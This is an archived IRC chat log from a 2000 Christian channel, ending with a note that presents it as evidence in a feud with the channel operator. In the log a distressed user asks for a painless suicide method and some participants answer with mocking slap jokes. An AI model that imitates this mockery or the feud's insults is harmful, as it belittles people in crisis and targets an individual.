[12:28] <Raid> CiCi: I didn't want to risk having to explain what netbios open shares are again. ;p
[12:28] *** hunnynut ([email protected] e-city.tx.da.uu.net) Quit
[12:29] *** prophecy_ ([email protected] ertysurf.co.uk) Quit (Leaving)
[12:29] <anyways> anyone else under 15 on this channel?
[12:29] *** Dmel ([email protected]) Quit (Leaving)
[12:33] *** SixSteps ([email protected] est.net) has joined #CHristian
[12:33] *** SixSteps ([email protected] est.net) has left #CHristian
[12:33] * patience_ will bbl
[12:34] <anyways> any girls wanna chat to Jasmine?
[12:37] <quietloop> is this a flirt channel
[12:37] <anyways> lol
[12:37] <anyways> Jasmine is 9 and she's a girl wanting to chat to another girl her own age
[12:38] <anyways> do you call that flirting?
[12:38] <anyways> :)
[12:38] *** Philip15 ([email protected]) has joined #CHristian

[12:38] <CiCi> I"m not her age, but I'll chat with her if she wants
[12:39] <LC> If jasmine wants to talk to a Baptist preacher...old enough to be her dad...or grand dad...I will be glad to as well
[12:40] <Raid> lol
[12:40] <anyways> :)
[12:41] <anyways> Thanks for the offer
[12:42] <Raid> /msg LC I thought I'd help you out. Heres my number so your lawyer can contact me. (310) 883-2304 Ext 620
[12:42] <Raid> doh
[12:42] <Raid> stupid paster
[12:43] <Raid> if im not there, leave a msg with a number; I'll call you back on my dime.
[12:44] * Raid is away since 12:44:05 - 09/09/2000 ( Must find food... Wheres that burger king? ) - Msgs will be saved.
[12:44] *** patience_ is now known as pataway
[12:44] *** ontario_2 ([email protected] able.net) has joined #CHristian
[12:45] *** ontario_2 ([email protected] able.net) has left #CHristian
[12:45] *** Adar_Caan ([email protected]. home.com) has joined #CHristian
[12:45] *** Philip15 ([email protected]) Quit (Ping timeout for Philip15)
[12:48] *** Nell` ([email protected] .grid.net) has joined #CHristian
[12:48] *** Nell` ([email protected] .grid.net) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius)
[12:48] *** kosmos ([email protected] m.au) has joined #CHristian
[12:49] *** ecomaster ([email protected] et) has joined #CHristian
[12:49] *** LC ([email protected] aturn.bbn.com) has left #CHristian (Peace & Protection 4.00 FINAL BETA)
[12:49] *** ecomaster is now known as eminemx
[12:49] <eminemx> hello
[12:49] <eminemx> I need help
[12:49] <anyways> with what?
[12:49] <eminemx> I feel awful
[12:50] <eminemx> I just found out my girlfriend has been cheating on me...I need some direction
[12:50] <Elijah_> ouch...i'm sorry. :(
[12:50] <anyways> oh dear
[12:50] <anyways> I'm very sorry for you
[12:51] <eminemx> I feel like dying
[12:51] <anyways> That is tough
[12:51] <eminemx> I know she is confused
[12:51] <Elijah_> been there, done that. :(
[12:51] <anyways> are you a christian and is your g/f?
[12:51] <eminemx> I am ...she is not =(
[12:52] * kosmos -------(o<----(o<----(o<-
[12:52] *** aphrael ([email protected]) Quit (Leaving)
[12:54] <eminemx> I want to die!
[12:54] <eminemx> but I dont know how
[12:54] <eminemx> painless
[12:54] <eminemx> fast
[12:54] * kosmos slaps eminemx around a bit with a Pirahna
[12:54] <quietloop> dying is easy ... living is hard
[12:55] <pataway> (((((((((( eminemx ))))))))))
[12:55] <quietloop> i want to live
[12:55] <quietloop> easy is no goot
[12:55] <anyways> hey, there's tons of things I could tell you right now, but I don't think they're things you want to hear just now
[12:55] <eminemx> what
[12:55] <eminemx> please say something
[12:55] <anyways> well
[12:55] <eminemx> I am crying like a d*** baby!
[12:55] <pataway> dying wont solve anything
[12:55] * kosmos picks up the nearest cement mixer and slams it on eminemx's head.
[12:55] <quietloop> crying is goot
[12:55] <pataway> kosmos you7re not helpin
[12:55] *** Disconnected

Session Close: Sat Sep 09 13:13:06 2000

These text files comprise the war with Undernet IRC op CiCi so far. As you can see by reading the files yourself, she isn't qualified for her position. She be way too dumb.